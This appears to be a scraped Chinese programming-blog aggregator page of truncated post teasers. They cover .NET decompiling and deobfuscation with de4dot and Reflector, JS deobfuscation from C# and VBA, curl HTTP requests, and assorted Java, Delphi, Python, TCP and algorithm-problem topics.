    net破解一(反编译,反混淆-剥壳,工具推荐) 大家好,前段时间做数据分析,需要解析对方数据,而数据文件是对方公司内部的生成方式,完全不知道它是怎么生成的. 不过还好能拿到客户端(正好是C#开发)所以 ...

  6. RESTClient调试POST方法&Reflector+de4dot反混淆破解dll

    RESTClient调试POST方法 RESTClient是火狐的一款WebAPI测试工具. 1.先看下我们要调试的接口

  7. .net反混淆脱壳工具de4dot的使用

    de4dot是一个开源的.net反混淆脱壳工具,是用C#编写的,介绍一下它的使用方法 首先 pushd 到de4dot.exe所在文件夹,然后调用 de4dot.exe  路径+dll名称 如果显示: ...

  8. 通过C#调用,实现js加密代码的反混淆,并运行js函数

    前一篇我测试了vba调用htmlfile做反混淆,并执行js加密函数的代码.本文换成C#实现. 联系QQ:564955427 C#操作JS函数,可以通过ScriptControl组件,但这个组件只能在 ...

  9. 使用VBA进行JS加密的反混淆,还原JS代码。

    本文地址:http://www.cnblogs.com/Charltsing/p/JSEval.html 联系QQ:564955427 类似下面的代码是登陆 全国企业信用信息公示系统(安徽)(网址:h ...

随机推荐

  1. java中多种方式读文件

    转自:http://www.jb51.net/article/16396.htm java中多种方式读文件 一.多种方式读文件内容. 1.按字节读取文件内容 2.按字符读取文件内容 3.按行读取文件内 ...

  2. delphi 更改DBGrid 颜色技巧

    1.根据条件更改某一单元格的颜色 procedure TMainFrm.First_DGDrawColumnCell(Sender: TObject; const Rect: TRect; DataC ...

  3. Delphi处理事件函数中的Sender: TObject代表什么?

    下面这个按钮点击事件中,Sender代表谁? procedure Tsomain.ToolButton1Click(Sender: TObject); 是代表事件的拥有者吗? procedure TF ...

  4. Linux命令发送Http GET/POST请求

    Get请求 curl命令模拟Get请求: 1.使用curl命令: curl "http://www.baidu.com" 如果这里的URL指向的是一个文件或者一幅图都可以直接下载到 ...

  5. 【Python】Python中*args 和**kwargs的用法

    好久没有学习Python了,应为工作的需要,再次拾起python,唤起记忆. 当函数的参数不确定时,可以使用*args 和**kwargs,*args 没有key值,**kwargs有key值. 还是 ...

  6. 【bzoj4715】囚人的旋律 dp

    题目描述 给你一个 $1\sim n$ 的排列 $a_i$ ,若 $i\le j$ 且 $a_i\ge a_j$ ,则 $i$ 到 $j$ 有一条边.现在给你这张图,求既是独立集(任意两个选定点都没有 ...

  7. tcp协议的六个标识位

    6个标识位: URG 紧急指针,告诉接收TCP模块紧要指针域指着紧要数据. ACK 置1时表示确认号(为合法,为0的时候表示数据段不包含确认信息,确认号被忽略. PSH 置1时请求的数据段在接收方得到 ...

  8. 【题解】CF#403 D-Beautiful Pairs of Numbers

    这题还挺对胃口的哈哈~是喜欢的画风!回家路上一边听歌一边想到的解法,写出来记录一下…… 首先,由于 \(b_{k} < a_{k + 1}\) ,所以我们可以看作是在一个长度为 n 的序列上选择 ...

  9. [SDOI2013]淘金 数位DP

    做了好久.... 大致思路: 求出前k大的方格之和即为答案, 先考虑一维的情况,设f[i]为数位上各个数相乘为i的数的总数,也就是对于数i,有f[i]个数它们各个位相乘为i, 再拓展到二维,根据乘法原 ...

  10. BZOJ3224:普通平衡树——题解

    http://www.lydsy.com/JudgeOnline/problem.php?id=3224 题面源于洛谷 题目描述 您需要写一种数据结构(可参考题目标题),来维护一些数,其中需要提供以下 ...